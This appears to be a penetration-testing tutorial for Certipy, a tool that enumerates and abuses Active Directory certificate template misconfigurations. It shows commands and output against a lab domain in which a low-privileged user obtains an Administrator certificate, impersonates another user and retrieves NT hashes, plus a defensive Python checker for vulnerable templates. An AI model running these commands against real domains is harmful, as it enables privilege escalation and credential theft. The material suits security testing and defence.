[Web pentesting] Penetration testing workflow: using Certipy to check Active Directory certificate security
About Certipy
Certipy is a Python tool that helps researchers enumerate and abuse misconfigurations in Active Directory Certificate Services (AD CS).
Installation
Clone the project source with the following command:
git clone https://github.com/ly4k/Certipy.git
Then change to the project root directory in a terminal and run:
$ python3 setup.py install
Don't forget to add the Python scripts directory to the system PATH.
Usage
$ certipy -h
usage: certipy [-h] [-debug] [-target-ip ip address] [-nameserver nameserver] [-dns-tcp] [-hashes LMHASH:NTHASH] [-no-pass] [-k] [-dc-ip ip address]
               target {find,req,auth,auto} ...

Active Directory certificate abuse

positional arguments:
  target                [[domain/]username[:password]@]<target name or address>
  {find,req,auth,auto}  action
    find                find certificate templates
    req                 request a new certificate
    auth                authenticate using a certificate
    auto                automatically abuse certificate templates for privilege escalation

optional arguments:
  -h, --help            show this help message and exit
  -debug                turn on debug output
  -no-pass              don't ask for password
  -k                    use Kerberos authentication
  -dc-ip ip address     IP address of the domain controller

connection:
  -target-ip ip address IP address of the target machine
  -nameserver nameserver
                        nameserver used for DNS resolution
  -dns-tcp              use TCP instead of UDP for DNS queries

authentication:
  -hashes LMHASH:NTHASH NTLM hashes, format is LMHASH:NTHASH
Usage examples
Automatic mode
In the example below, the user john is a low-privileged user who is allowed to enroll in the Copy of Web Server template:
$ certipy 'predator/john:Passw0rd@dc.predator.local' auto
[*] Trying template 'Copy of Web Server' with CA 'predator-DC-CA'
[*] Generating RSA key
[*] Requesting certificate
[*] Request success
[*] Got certificate with UPN 'Administrator'
[*] Saved certificate to '1.crt'
[*] Saved private key to '1.key'
[*] Using UPN: 'Administrator@predator'
[*] Trying to get TGT...
[*] Saved credential cache to 'Administrator.ccache'
[*] Trying to retrieve NT hash for 'Administrator@predator'
[*] Got NT hash for 'Administrator@predator': fc525c9683e8fe067095ba2ddc971889
By default the tool targets the Administrator account; the -user parameter creates a certificate for a different user instead.
Find
The find action looks for certificate templates that are enabled on one or more CAs.
Finding vulnerable templates
The -vulnerable parameter searches for vulnerable certificate templates:
$ certipy 'predator/john:Passw0rd@dc.predator.local' find -vulnerable
[*] Finding vulnerable certificate templates for 'john'
User
  Name                                  : predator\john
  Groups                                :
Certificate Authorities
  0
    CA Name                             : predator-DC-CA
    DNS Name                            : dc.predator.local
    Certificate Subject                 : CN=predator-DC-CA, DC=predator, DC=local
    Certificate Serial Number           : 1976D0FEFCAFC9A84D02D305FA88D84D
    Certificate Validity Start          : 2021-10-06 11:32:01+00:00
    Certificate Validity End            : 2026-10-06 11:42:01+00:00
    User Specified SAN                  : Disabled
    CA Permissions
      Owner                             : BUILTIN\Administrator
      Access Rights
        ManageCertificates              : BUILTIN\Administrator
                                          predator\Domain Admins
                                          predator\Enterprise Admins
        ManageCa                        : BUILTIN\Administrator
                                          predator\Domain Admins
                                          predator\Enterprise Admins
        Enroll                          : Authenticated Users
Vulnerable Certificate Templates
  0
    CAs                                 : predator-DC-CA
    Template Name                       : Copy of Web Server
    Validity Period                     : 2 years
    Renewal Period                      : 6 weeks
    Certificate Name Flag               : EnrolleeSuppliesSubject
    Enrollment Flag                     : None
    Authorized Signatures Required      : 0
    Extended Key Usage                  :
    Permissions
      Enrollment Permissions
        Enrollment Rights               : predator\Domain Admins
                                          predator\Enterprise Admins
                                          Authenticated Users
      Object Control Permissions
        Owner                           : predator\Administrator
        Write Owner Principals          : predator\Domain Admins
                                          predator\Enterprise Admins
                                          predator\Administrator
        Write Dacl Principals           : predator\Domain Admins
                                          predator\Enterprise Admins
                                          predator\Administrator
        Write Property Principals       : predator\Domain Admins
                                          predator\Enterprise Admins
                                          predator\Administrator
    Vulnerable Reasons                  : 'Authenticated Users' can enroll, enrollee supplies subject and template allows authentication
                                          'Authenticated Users' can enroll and template has dangerous EKU
The -user parameter looks for vulnerable templates from the perspective of a specified user; by default the current user is used.
Finding all templates
$ certipy 'predator/john:Passw0rd@dc.predator.local' find
[*] Finding certificate templates for 'john'
User
  Name                                  : predator\john
  Groups                                :
Certificate Authorities
  0
    CA Name                             : predator-DC-CA
    DNS Name                            : dc.predator.local
    Certificate Subject                 : CN=predator-DC-CA, DC=predator, DC=local
    Certificate Serial Number           : 1976D0FEFCAFC9A84D02D305FA88D84D
    Certificate Validity Start          : 2021-10-06 11:32:01+00:00
    Certificate Validity End            : 2026-10-06 11:42:01+00:00
    User Specified SAN                  : Disabled
    CA Permissions
      Owner                             : BUILTIN\Administrator
      Access Rights
        ManageCertificates              : BUILTIN\Administrator
                                          predator\Domain Admins
                                          predator\Enterprise Admins
        ManageCa                        : BUILTIN\Administrator
                                          predator\Domain Admins
                                          predator\Enterprise Admins
        Enroll                          : Authenticated Users
Certificate Templates
  0
    CAs                                 : predator-DC-CA
    Template Name                       : User
    Validity Period                     : 1 year
    Renewal Period                      : 6 weeks
    Certificate Name Flag               : SubjectRequireDirectoryPath
                                          SubjectRequireEmail
                                          SubjectAltRequireEmail
                                          SubjectAltRequireUpn
    Enrollment Flag                     : AutoEnrollment
                                          PublishToDs
                                          IncludeSymmetricAlgorithms
    Authorized Signatures Required      : 0
    Extended Key Usage                  : Encrypting File System
                                          Secure Email
                                          Client Authentication
    Permissions
      Enrollment Permissions
        Enrollment Rights               : predator\Domain Admins
                                          predator\Domain Users
                                          predator\Enterprise Admins
      Object Control Permissions
        Owner                           : predator\Enterprise Admins
        Write Owner Principals          : predator\Domain Admins
                                          predator\Enterprise Admins
        Write Dacl Principals           : predator\Domain Admins
                                          predator\Enterprise Admins
        Write Property Principals       : predator\Domain Admins
                                          predator\Enterprise Admins
[...]
  11
    CAs                                 : predator-DC-CA
    Template Name                       : Copy of Web Server
    Validity Period                     : 2 years
    Renewal Period                      : 6 weeks
    Certificate Name Flag               : EnrolleeSuppliesSubject
    Enrollment Flag                     : None
    Authorized Signatures Required      : 0
    Extended Key Usage                  :
    Permissions
      Enrollment Permissions
        Enrollment Rights               : predator\Domain Admins
                                          predator\Enterprise Admins
                                          Authenticated Users
      Object Control Permissions
        Owner                           : predator\Administrator
        Write Owner Principals          : predator\Domain Admins
                                          predator\Enterprise Admins
                                          predator\Administrator
        Write Dacl Principals           : predator\Domain Admins
                                          predator\Enterprise Admins
                                          predator\Administrator
        Write Property Principals       : predator\Domain Admins
                                          predator\Enterprise Admins
                                          predator\Administrator
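The two "Vulnerable Reasons" in the find output above follow from a handful of template attributes. The checker below, an added example rather than Certipy's own code, re-derives them from template records constructed here to mirror the Copy of Web Server and User templates, so a defender can see exactly which attribute combination triggers each finding (the Template class, group list and EKU list are modelled for this example, not taken from Certipy):

```python
from dataclasses import dataclass

# Groups every domain member is in (ad-hoc list for this example)
LOW_PRIV_PRINCIPALS = {"Authenticated Users", "Domain Users", "Domain Computers", "Everyone"}
# EKUs that let a certificate authenticate via Kerberos PKINIT
AUTH_EKUS = {"Client Authentication", "PKINIT Client Authentication", "Smart Card Logon", "Any Purpose"}

@dataclass(frozen=True)
class Template:
    """Subset of the attributes shown in the find output (modelled here, not Certipy's own class)."""
    name: str
    certificate_name_flags: frozenset
    extended_key_usage: frozenset        # empty set == no EKU restriction at all
    authorized_signatures_required: int
    enrollment_rights: frozenset         # principals, optionally prefixed with DOMAIN\

def low_priv_enrollers(t):
    """Low-privileged principals holding Enroll, with any DOMAIN\\ prefix stripped."""
    return sorted({p.split("\\")[-1] for p in t.enrollment_rights} & LOW_PRIV_PRINCIPALS)

def allows_authentication(t):
    # No EKU means the certificate is valid for any purpose, authentication included
    return not t.extended_key_usage or bool(t.extended_key_usage & AUTH_EKUS)

def has_dangerous_eku(t):
    # "Any Purpose" or an empty EKU list: the template does not limit what the cert is for
    return not t.extended_key_usage or "Any Purpose" in t.extended_key_usage

def vulnerable_reasons(t):
    """Findings for one template in the wording Certipy prints, or [] when clean."""
    reasons = []
    for who in low_priv_enrollers(t):
        if ("EnrolleeSuppliesSubject" in t.certificate_name_flags
                and t.authorized_signatures_required == 0 and allows_authentication(t)):
            reasons.append(f"'{who}' can enroll, enrollee supplies subject and template allows authentication")
        if t.authorized_signatures_required == 0 and has_dangerous_eku(t):
            reasons.append(f"'{who}' can enroll and template has dangerous EKU")
    return reasons

# Constructed records mirroring the two templates in the find output above
COPY_OF_WEB_SERVER = Template(
    "Copy of Web Server", frozenset({"EnrolleeSuppliesSubject"}), frozenset(), 0,
    frozenset({"predator\\Domain Admins", "predator\\Enterprise Admins", "Authenticated Users"}))
USER = Template(
    "User", frozenset({"SubjectRequireDirectoryPath", "SubjectRequireEmail",
                       "SubjectAltRequireEmail", "SubjectAltRequireUpn"}),
    frozenset({"Encrypting File System", "Secure Email", "Client Authentication"}), 0,
    frozenset({"predator\\Domain Admins", "predator\\Domain Users", "predator\\Enterprise Admins"}))
```

Removing EnrolleeSuppliesSubject, requiring a manager approval or a signature, or restricting the EKU list each clears a finding, which is what the remediation for this template looks like when checked against the same rules.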
Request
Here the user john requests a valid authentication certificate on behalf of the user jane; predator-DC-CA has the Copy of Web Server template enabled:
$ certipy 'predator/john:Passw0rd@dc.predator.local' req -template 'Copy of Web Server' -ca 'predator-DC-CA' -alt 'jane'
[*] Generating RSA key
[*] Requesting certificate
[*] Request success
[*] Got certificate with UPN 'jane'
[*] Saved certificate to '2.crt'
[*] Saved private key to '2.key'
Requesting a certificate as the current user
$ certipy 'predator/john:Passw0rd@dc.predator.local' req -template 'User' -ca 'predator-DC-CA'
[*] Generating RSA key
[*] Requesting certificate
[*] Request success
[*] Got certificate with UPN 'john@predator.local'
[*] Saved certificate to '3.crt'
[*] Saved private key to '3.key'
Authentication
The auth action authenticates with the supplied certificate using the PKINIT Kerberos extension:
$ certipy 'predator/jane@dc.predator.local' auth -cert ./2.crt -key ./2.key
[*] Using UPN: 'jane@predator'
[*] Trying to get TGT...
[*] Saved credential cache to 'jane.ccache'
[*] Trying to retrieve NT hash for 'jane@predator'
[*] Got NT hash for 'jane@predator': 077cccc23f8ab7031726a3b70c694a49
Project
Certipy: https://github.com/ly4k/Certipy
References
https://www.specterops.io/assets/resources/Certified_Pre-Owned.pdf
https://github.com/dirkjanm/PKINITtools